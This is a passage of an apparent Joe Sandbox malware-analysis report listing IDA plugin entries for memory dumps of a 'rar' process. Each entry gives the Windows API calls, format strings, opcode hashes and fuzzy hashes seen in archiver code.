                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                      • String ID: SeBackupPrivilege
                                                                                                                                                                      • API String ID: 3094086963-2429070247
                                                                                                                                                                      • Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                      • Instruction ID: 042f589ef1585c6e97f5e62f491f6d9200baa1d92f06defffd980cd8960264b0
                                                                                                                                                                      • Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                      • Instruction Fuzzy Hash: 4961D633A0864186EF148B65E4443E93360FB643A4F414236FB6E9AAD4DFBDD166C70A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Sleepswprintf
                                                                                                                                                                      • String ID: $%ls%0*u.rev
                                                                                                                                                                      • API String ID: 407366315-3491873314
                                                                                                                                                                      • Opcode ID: 25855a95eac825c785954cce864972a9ce0fc7f6a10ff8bf9b11e07335496b94
                                                                                                                                                                      • Instruction ID: 3cc2422f2ceb533d1d678050904527681b3abda4918abc61d2886b7e32da8f73
                                                                                                                                                                      • Opcode Fuzzy Hash: 25855a95eac825c785954cce864972a9ce0fc7f6a10ff8bf9b11e07335496b94
                                                                                                                                                                      • Instruction Fuzzy Hash: 85023533A0468286EF20DF25E4443AD77A5FB99788F020035EE5D8779AEEBEE451C705
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • new.LIBCMT ref: 00007FF6EE734BD8
                                                                                                                                                                        • Part of subcall function 00007FF6EE77B6D0: Sleep.KERNEL32(?,?,?,?,00007FF6EE74CBED,?,00000000,?,00007FF6EE777A8C), ref: 00007FF6EE77B730
                                                                                                                                                                        • Part of subcall function 00007FF6EE751E80: CreateFileW.KERNELBASE ref: 00007FF6EE751F4A
                                                                                                                                                                        • Part of subcall function 00007FF6EE751E80: GetLastError.KERNEL32 ref: 00007FF6EE751F59
                                                                                                                                                                        • Part of subcall function 00007FF6EE751E80: CreateFileW.KERNELBASE ref: 00007FF6EE751F99
                                                                                                                                                                        • Part of subcall function 00007FF6EE751E80: GetLastError.KERNEL32 ref: 00007FF6EE751FA2
                                                                                                                                                                        • Part of subcall function 00007FF6EE751E80: SetFileTime.KERNEL32 ref: 00007FF6EE751FF1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CreateErrorLast$SleepTime
                                                                                                                                                                      • String ID: %12s %s$%12s %s$ $%s
                                                                                                                                                                      • API String ID: 2965465231-221484280
                                                                                                                                                                      • Opcode ID: da7eeb6571ed9bba8ebcc7f74e29d7294f67c9c1e8ac790699657ab93618cb17
                                                                                                                                                                      • Instruction ID: fa527eb05ebe1ab9fe5d1174fc743f593a96142be35815511dcfb5fb79443c55
                                                                                                                                                                      • Opcode Fuzzy Hash: da7eeb6571ed9bba8ebcc7f74e29d7294f67c9c1e8ac790699657ab93618cb17
                                                                                                                                                                      • Instruction Fuzzy Hash: A3F1E123B09A4685EFA4DB11D4483BD63A1FB64B84F460031FA4D87785EFBED4A5C30A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                      • Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                      • Instruction ID: 39adb5df7176186f126c91785b5ca27ebae6314de348b5b3117b82cc8e115fb8
                                                                                                                                                                      • Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                      • Instruction Fuzzy Hash: D1316D37608B8186DB608F24E8403AA33A4FB98758F510136EA8D83B98EF79C165CB05
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3398352648-0
                                                                                                                                                                      • Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                      • Instruction ID: 256fcdd5afeece214ee3469ebe50379652eac1afc1eeef3c93c1cf9c62afafdc
                                                                                                                                                                      • Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                      • Instruction Fuzzy Hash: 5A117F33A18B4186EB508F61F44066BB3A5FB98B90F454436FA8E83A28DF7DE015CB44
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,?,00007FF6EE7511B0,?,?,?,00000000,?,?,00007FF6EE74F30F,00000000,00007FF6EE736380,?,00007FF6EE732EC8), ref: 00007FF6EE753AC4
                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,?,00007FF6EE7511B0,?,?,?,00000000,?,?,00007FF6EE74F30F,00000000,00007FF6EE736380,?,00007FF6EE732EC8), ref: 00007FF6EE753B0A
                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 00007FF6EE753B55
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,00007FF6EE7511B0,?,?,?,00000000,?,?,00007FF6EE74F30F,00000000,00007FF6EE736380,?,00007FF6EE732EC8), ref: 00007FF6EE753B60
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                       • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                       • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                       • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                       • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
                                                                                                                                                                       • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                       • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                       • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                       • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                       • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                       • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile$CloseControlDeviceHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 998109204-0
                                                                                                                                                                      • Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                      • Instruction ID: 2df5fb08c05b9cb601935c04be98830e0bf8a6f041a1da3e78c2fb3caa20c537
                                                                                                                                                                      • Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                      • Instruction Fuzzy Hash: 5331AF32618B8186EB608F11F44469AB7A5FB987E4F010235EEAD43BD8CF7DC465CB04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: CMT
                                                                                                                                                                      • API String ID: 0-2756464174
                                                                                                                                                                      • Opcode ID: 6111d3dafd19f65bc3558291276909d6d167d2f641e81f6c87bebc1b0329fce1
                                                                                                                                                                      • Instruction ID: 81404da86b389d8dac33628959cf7b03bd6a0b8c1d6a3bc9e4db80584cc8a303
                                                                                                                                                                      • Opcode Fuzzy Hash: 6111d3dafd19f65bc3558291276909d6d167d2f641e81f6c87bebc1b0329fce1
                                                                                                                                                                      • Instruction Fuzzy Hash: E5D10763A1868281EF60EB21D4482BD6391FFA5780F460531FA5E877D5DEBEE511C30A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6EE798704
                                                                                                                                                                        • Part of subcall function 00007FF6EE794E3C: GetCurrentProcess.KERNEL32(00007FF6EE799CC5), ref: 00007FF6EE794E69
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: *?$.
                                                                                                                                                                      • API String ID: 2518042432-3972193922
                                                                                                                                                                      • Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                      • Instruction ID: de4b83c410992eb1de5f195630b0efb62791dcb2458571ece7d063ec8db988dc
                                                                                                                                                                      • Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                      • Instruction Fuzzy Hash: F851F123B24A9585FF10CFA2D8016AC63A4FF64BD8B464531EE0D97B85EEBED061C305
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3429775523-0
                                                                                                                                                                      • Opcode ID: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                      • Instruction ID: 57d54356ceef7a1070e652fcb9c474b5cac4e53601461aaf6c1ccbae0da0ed22
                                                                                                                                                                      • Opcode Fuzzy Hash: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                      • Instruction Fuzzy Hash: 7F113472B14A018AEB108FB5E4813AE7BB0FB48748F41153AEA8D93A58DF3CC154CB04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DiskFreeSpace
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1705453755-0
                                                                                                                                                                      • Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                                                                                                                                      • Instruction ID: a116587916066a3e7d9e9f0ffc6dd25200f09d9da0bfbded397642d5a61c7dfb
                                                                                                                                                                      • Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                                                                                                                                      • Instruction Fuzzy Hash: 83016D23A2868186EF70DB25E4413AA73A0FB94748F810131F6CCC255CDEADD658CF05
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
• API String ID: 3215553584-2617248754
• Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
• Instruction ID: 511ca136a9618b9e854128389c17999a6bc2f9a9cc59a80a85e1c8dab72e024a
• Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
• Instruction Fuzzy Hash: E141AD73A09B4589FB00CF64E8517A933A4EB28398F024236EE5C87B59DE7ED075C349
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: Console$Mode$Handle$Readfflush
• String ID:
• API String ID: 1039280553-0
• Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
• Instruction ID: 1801f4029ef6b22c7a9ad4074285676b4bc6fc0775328434f1463caca69e5f58
• Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
• Instruction Fuzzy Hash: 5821C227B1864283FF009F25E8002396361FBA9BA1F150135FE4E43768DEBEE456C705
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: ExceptionThrowstd::bad_alloc::bad_alloc
• String ID:
• API String ID: 932687459-0
• Opcode ID: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
• Instruction ID: 4c243f376adb5ec8ac2169f66ee66342b0f97774cd03187c1d834636128688ad
• Opcode Fuzzy Hash: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
• Instruction Fuzzy Hash: EA81F423E08A9285FF64DA11E4443BD6351EB74B94F164031FA4D87A99DFBEE462C30E
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: swprintf
• String ID: ;%u$x%u$xc%u
• API String ID: 233258989-2277559157
• Opcode ID: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
• Instruction ID: 8b33b009302a6b88dcf278749a83187748b4dc6a3b7e3e4e372c0a3da6d537b2
• Opcode Fuzzy Hash: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
• Instruction Fuzzy Hash: 7A02B123B1C68241FFA4DA21D1493FE2751AB61784F024031EA8EC7786DEBEE564C71B
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
